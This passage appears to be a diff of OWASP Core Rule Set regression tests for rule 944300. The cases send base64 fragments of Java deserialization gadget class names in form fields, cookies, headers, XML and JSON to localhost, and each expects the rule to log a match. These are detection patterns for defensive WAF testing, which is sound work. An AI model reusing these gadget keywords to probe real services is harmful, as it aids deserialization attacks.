"en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-153 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-154 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-155 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-156 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-157 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-158 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-159 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-160 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - 
test_title: 944300-161 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-162 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-163 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-164 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-165 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-166 + desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-167 + desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-168 + desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-169 + desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-170 + desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id 
\"944300\"" + - test_title: 944300-171 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-172 + desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-173 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-174 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-175 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-176 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-177 + desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-178 + desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-179 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-180 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 
944300-181 + desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-182 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-183 + desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-184 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-185 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-186 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-187 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + 
method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-188 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-189 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-190 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-191 + desc: "Cookie name includes 
keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-192 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-193 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-194 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-195 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-196 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-197 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 
"HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-198 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-199 + desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - 